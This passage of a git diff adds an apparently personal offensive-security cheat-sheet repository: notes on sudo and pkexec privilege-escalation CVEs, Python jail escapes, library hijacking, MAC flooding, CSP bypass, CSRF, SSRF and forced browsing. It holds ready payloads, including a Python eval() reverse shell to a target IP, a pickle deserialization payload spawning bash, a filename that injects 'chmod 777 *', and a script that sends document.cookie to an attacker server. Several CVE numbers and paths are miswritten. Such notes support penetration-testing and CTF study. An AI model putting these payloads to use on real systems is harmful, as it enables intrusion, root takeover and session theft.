permissions on all the files +```sh +touch './"";$(chmod 777 *)' +``` + diff --git a/Exploits/Linux/pkexec.md b/Exploits/Linux/pkexec.md new file mode 100644 index 0000000..17777f4 --- /dev/null +++ b/Exploits/Linux/pkexec.md @@ -0,0 +1,11 @@ +# CVE-2021-4032 + +* [Qualys put it in the open](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) +* [arthepsy's exploit](https://github.com/arthepsy/CVE-2021-4034) + +* Arg counting starts at 1 inside pkexec logic +* `execve( "/usr/binpkexec", (char **){NULL}, env)` puts NULL into argc[1] +* The value behind NULL can be overwritten, which is the first env param + + + diff --git a/Exploits/Linux/sudo.md b/Exploits/Linux/sudo.md new file mode 100644 index 0000000..38e1126 --- /dev/null +++ b/Exploits/Linux/sudo.md @@ -0,0 +1,58 @@ +# CVE-2021-3156 Baron Samedit + +* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit) +* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git) +* Heap based overflow +* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1 +* Check vulnerability via +```sh +sudoedit -s '\' $(python -c "print('\x41' * 10000)") +``` +* Defaults to try +```sh +./brute.sh 90 120 50 70 150 300 +``` + +## CVE-2019-14287 + +* Versions < 1.8.28 + +### Usage + +* Integer overflow with resulting root status. +```sh +sudo -u#-1 +``` +## CVE-18634 + +* Sudo pwnge with pwfeedback() +* Sudo version 1.7.1 to 1.8.30 +* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634) + + +## Reusing Sudo Token + +* Reuse sudo token of currently logged in user +* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens) + +* `ptrace` has to be fully enabled +```sh +cat /proc/sys/kernel/yama/ptrace_scope +0 +``` +* sudo has to be triggered the last 15 minutes, check `ps wuax` +* `gdb` has to be installed +* One must be logged in as the same user which should be owned +* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject) + +## Heap Based Overflow + +* [CVE-2022-43995](https://bugzilla.redhat.com/show_bug.cgi?id=2139911) + +Marco Benatto: +> Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains +a plugins/sudoers/auth/passwd.c array-out-of-bounds error that can result +in a heap-based buffer over-read. This can be triggered by arbitrary local +users with access to Sudo by entering a password of seven characters or + fewer. The impact could vary depending on the compiler and processor architecture. + diff --git a/Exploits/Networks/MAC Spoofing.md b/Exploits/Networks/MAC Spoofing.md new file mode 100644 index 0000000..cedbee5 --- /dev/null +++ b/Exploits/Networks/MAC Spoofing.md @@ -0,0 +1,9 @@ +# MAC Spoofing + +```sh +macof -i +``` +or +```sh +ettercap -T -i -P rand_flood -q -w file.pcap +``` diff --git a/Exploits/Printers/preta.md b/Exploits/Printers/preta.md new file mode 100644 index 0000000..cb8bdab --- /dev/null +++ b/Exploits/Printers/preta.md @@ -0,0 +1,4 @@ +# Printer Hacking + +* [Preta](https://github.com/RUB-NDS/PRET) +* [Cheat Sheet](http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet) diff --git a/Exploits/Python/Code Injection.md b/Exploits/Python/Code Injection.md new file mode 100644 index 0000000..fc2b2e2 --- /dev/null +++ b/Exploits/Python/Code Injection.md @@ -0,0 +1,10 @@ +# Code Injection + +* Python's `input()`, `exec()` and `eval()` makes it possible + +## Usage + +* Payload example +```python +eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#") +``` diff --git a/Exploits/Python/Decompile pyc.md b/Exploits/Python/Decompile pyc.md new file mode 100644 index 0000000..0fc6680 --- /dev/null +++ b/Exploits/Python/Decompile pyc.md @@ -0,0 +1,5 @@ +# Decompile PYC + +```sh +uncompyle6 file.pyc +``` diff --git a/Exploits/Python/Flask Cookie Decoding.md b/Exploits/Python/Flask Cookie Decoding.md new file mode 100644 index 0000000..d6f9a49 --- /dev/null +++ b/Exploits/Python/Flask Cookie Decoding.md @@ -0,0 +1,36 @@ +import zlib +import sys +import json +from itsdangerous import base64_decode + + +def decode(cookie): + """ + Decode a Flask cookie + + https://www.kirsle.net/wizards/flask-session.cgi + """ + try: + compressed = False + payload = cookie + + if payload.startswith('.'): + compressed = True + payload = payload[1:] + + data = payload.split(".")[0] + + data = base64_decode(data) + if compressed: + data = zlib.decompress(data) + + return data.decode("utf-8") + except Exception as e: + return f"[Decoding error: are you sure this was a Flask session cookie? {e}]" + + +cookie = sys.argv[1] +data = decode(cookie) +json_data = json.loads(data) +pretty = json.dumps(json_data, sort_keys=True, indent=4, separators=(",", ": ")) +print(pretty) diff --git a/Exploits/Python/Jail Escape.md b/Exploits/Python/Jail Escape.md new file mode 100644 index 0000000..95d40d0 --- /dev/null +++ b/Exploits/Python/Jail Escape.md @@ -0,0 +1,18 @@ +# Escaping Jails + +* [Aneesh's blog](https://anee.me/escaping-python-jails-849c65cf306e?gi=a7d3bac81831) + +## Usage + +* Circumvent via `__builtins__` +```python +dir(__builtins__) +``` +```python +__builtins__.__dict__ +``` +* Call builtins +```python +__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash -p') +``` + diff --git a/Exploits/Python/Lib Hijacking.md b/Exploits/Python/Lib Hijacking.md new file mode 100644 index 0000000..81de964 --- /dev/null +++ b/Exploits/Python/Lib Hijacking.md @@ -0,0 +1,22 @@ +# Library Hijacking + +* [Article](https://medium.com/analytics-vidhya/python-library-hijacking-on-linux-with-examples-a31e6a9860c8) + +## Interpreter might be called invoking sudo +* Write into a library called inside the script + +## Path call order of packages +* Order of paths which are invoked to find packages may be found via +```sh +python -c 'import sys; print("\n".join(sys.path))' +``` +* Higher order directory on a path may have write permission. Insert a similar named package that gets called in the script. +* The highest order is `pwd` + +## Redirecting PYTHONPATH +* `SETENV` may be set while loading script through `sudo` +```sh +sudo PYTHONPATH=/tmp/ /usr/bin/python3.6 +``` + + diff --git a/Exploits/Python/Pickle.md b/Exploits/Python/Pickle.md new file mode 100644 index 0000000..a9de31e --- /dev/null +++ b/Exploits/Python/Pickle.md @@ -0,0 +1,21 @@ +# Pickle + +## Payload +* Inject payload +```python +import pickle +import os +import base64 +class evil_object(object): + def __reduce__(self): + return(os.system, ('/bin/bash',)) +x = evil_object() +x = evil_object() +y = pickle.dumps(x) +base64.b64encode(y) +``` + +* Dump serialized object via +```python +pickle.dump(SerializedPickle(), open('pickled.out', 'wb') +``` diff --git a/Exploits/Python/Scapy.md b/Exploits/Python/Scapy.md new file mode 100644 index 0000000..dcd3101 --- /dev/null +++ b/Exploits/Python/Scapy.md @@ -0,0 +1,4 @@ +# Scapy + +* [Doc](https://scapy.readthedocs.io/en/latest/introduction.html) + diff --git a/Exploits/Python/pwntools.md b/Exploits/Python/pwntools.md new file mode 100644 index 0000000..9384c4f --- /dev/null +++ b/Exploits/Python/pwntools.md @@ -0,0 +1,3 @@ +# Pwntools + +* [Docs](https://docs.pwntools.com/en/stable/) diff --git a/Exploits/References.md b/Exploits/References.md new file mode 100644 index 0000000..e9e9e2e --- /dev/null +++ b/Exploits/References.md @@ -0,0 +1,38 @@ +# Exploit References + +[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings.git) + +## Recover git Repositories +[Internetwache's gitTools](https://github.com/internetwache/GitTools.git) + +## Web + +[Padbuster - padding Oracle Attacks](https://github.com/AonCyberLabs/PadBuster.git) + +## Printer Exploitation +[RUB-NDS Printer Exploitation Framework](https://github.com/RUB-NDS/PRET.git) + +## Python + +[pwntools doc](https://docs.pwntools.com/en/stable/) +[pwntools installation](https://docs.pwntools.com/en/stable/install.html) + +## Java + +[fullhunt's log4j-scan](https://github.com/fullhunt/log4j-scan.git) +[pimps' JNID-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit.git) + +## Linux + +[DirtyPipe](https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git) + +## macOS + +[DS Store Crawler Parser](https://github.com/anantshri/DS_Store_crawler_parser.git) +[DS Store Exp](https://github.com/lijiejie/ds_store_exp.git) +[DS Store Exp Python3](https://github.com/qiuluo-oss/ds_store_exp_py3.git) + +## Windows + +[PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git) +[nishang](https://github.com/samratashok/nishang.git) diff --git a/Exploits/SSL+TLS/Heartbleed.md b/Exploits/SSL+TLS/Heartbleed.md new file mode 100644 index 0000000..23cded6 --- /dev/null +++ b/Exploits/SSL+TLS/Heartbleed.md @@ -0,0 +1,8 @@ +# Heartbleed + +* SSL V1.0.1 and V1.0.1f +* Client sends msg, msglength +* If msg is 0 and the msglength is longer, return from server is arbitrary memory content + +* [Heartbleed](https://heartbleed.com) + diff --git a/Exploits/Web/Bypass JS Filters.md b/Exploits/Web/Bypass JS Filters.md new file mode 100644 index 0000000..44df2b0 --- /dev/null +++ b/Exploits/Web/Bypass JS Filters.md @@ -0,0 +1,10 @@ +# Client Filters + +* Circumvent client side filters via + * Disable javascript + * Use curl +```sh +curl -X POST -F "submit=" -F "=@" +``` + * Intercept and modify incoming page via Burpsuite + * Intercept and modify upload of already loaded page via Burpsuite diff --git a/Exploits/Web/CSP.md b/Exploits/Web/CSP.md new file mode 100644 index 0000000..9094c83 --- /dev/null +++ b/Exploits/Web/CSP.md @@ -0,0 +1,52 @@ +# Content Security Policy (CSP) + +* Either in HTTP header or inside DOM's HTML +* [CSP directives](https://content-security-policy.com/#directive) +* [CSP evaluator](https://csp-evaluator.withgoogle.com/) +* [Bypassing csp](https://blog.0daylabs.com/2016/09/09/bypassing-csp/) + +## Sources +* `*` wildcard +* `none` +* `self` for sources delivered through the same protocol + * `default-src 'self';` may not load any script +* `unsafe-inline` +* `unsafe-eval` +* `test.com` loads resources from domain but not subdomains +* `*.test.com` loads resources from subdomains +* `data:...` critical usage +* `nonce` loads if nonce is correct. `sha256`, `sha384`, `sha512` + * [style hasher](https://report-uri.com/home/hash) + +## Usage + +### JSONP +Find JSONP endpoints through which to use custom callback functions +* [JSONBee](https://github.com/zigoo0/JSONBee) +```sh +"> +``` + +### Misconfiguration +Insert payload into `src` attribute + +### Exfiltration +* [Beeceptor](beeceptor.com) +* Local webserver +* `connect-src` while Ajax/XHR requests are enabled +* Disguising as an `image-src` or `media-src` source +```html + +``` +other payloads +```sh + +``` +* +```sh + + +
+{{$on.curry.call().document.location='https:///' + $on.curry.call().document.cookie}} +
+``` diff --git a/Exploits/Web/CSRF.md b/Exploits/Web/CSRF.md new file mode 100644 index 0000000..f5768a5 --- /dev/null +++ b/Exploits/Web/CSRF.md @@ -0,0 +1,11 @@ +# CSRF + +## Protection + +* May be a hidden field with an encoded value +```html + +``` +* This field need to be removed in order to do some csrf shenanigans +* Decode the value to reproduce some valid content. + diff --git a/Exploits/Web/Command Injection.md b/Exploits/Web/Command Injection.md new file mode 100644 index 0000000..80fd02c --- /dev/null +++ b/Exploits/Web/Command Injection.md @@ -0,0 +1,19 @@ +# Command Injection + +* Blind injection +* Verbose injection + +## Blind Injection +* Check via ping, open a `tcpdump` on ICMP to listen for packets +* Redirect to logfile and read +* Use `sleep` or `timeout` to check if ci is possible in general + +## Functions +* Watch out for + * `eval()` + * `exec()` + * `passthru()` + * `system()` + + + diff --git a/Exploits/Web/Cookie Tampering.md b/Exploits/Web/Cookie Tampering.md new file mode 100644 index 0000000..c3063f5 --- /dev/null +++ b/Exploits/Web/Cookie Tampering.md @@ -0,0 +1,22 @@ +# Cookie Tampering + +## Components + +* Separator is `;` +* Name +* Value +* Domain +* Path +* Expires/Maxage +* Size +* HttpOnly, no access by client side scripts +* Secure, HTTPs only +* SameSite, cookie sent through cross-site request +* SameParty, firt party requests only +* Priority + +## Response +* May look like this +```sh +Set-Cookie: =; Domain=; Secure; HttpOnly +``` diff --git a/Exploits/Web/Forced Browsing.md b/Exploits/Web/Forced Browsing.md new file mode 100644 index 0000000..346fa01 --- /dev/null +++ b/Exploits/Web/Forced Browsing.md @@ -0,0 +1,23 @@ +# Forced Browsing +Forced browsing is the art of using logic to find resources on the website that you would not normally be able to access. For example let's say we have a note taking site, that is structured like this. http://example.com/user1/note.txt. It stands to reason that if we did http://example.com/user2/note.txt we may be able to access user2's note. + +## Usage + +## Tools + +### wfuzz +* `pip install wfuzz` + +``` +wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hw 57 http://10.10.28.2/FUZZ/note.txt +``` + +|Parameter|Detail| +|---------|------| +|-c|Shows the output in color| +|-z|Specifies what will replace FUZZ in the request. For example -z file,big.txt will read through all the lines of big.txt and replace FUZZ with| +|--hc|Don't show certain http response codes| +|--hl|Don't show a certain amount of lines in the response| +|--hh|Don't show a certain amount of words| +|--hw|Don't show word response return val of this length| + diff --git a/Exploits/Web/HTTP Header Injection.md b/Exploits/Web/HTTP Header Injection.md new file mode 100644 index 0000000..9ff30aa --- /dev/null +++ b/Exploits/Web/HTTP Header Injection.md @@ -0,0 +1,8 @@ +# HTTP Header Injection & Cache Poisoning + +## References + +* [Portswigger]https://portswigger.net/web-security/host-header +* [Spring project](https://github.com/spring-projects/spring-security/issues/4310) +* [Skeletonscribe.com](https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html) + diff --git a/Exploits/Web/IDOR.md b/Exploits/Web/IDOR.md new file mode 100644 index 0000000..52f29d3 --- /dev/null +++ b/Exploits/Web/IDOR.md @@ -0,0 +1,3 @@ +# Insecure Direct Object Reference (IDOR) + +Changing URL parameters. diff --git a/Exploits/Web/Iframe.md b/Exploits/Web/Iframe.md new file mode 100644 index 0000000..109f34a --- /dev/null +++ b/Exploits/Web/Iframe.md @@ -0,0 +1,22 @@ +# SSRF through iframe + +* [taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/) +* Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server +```php + +``` +* Payload looks like this +```html +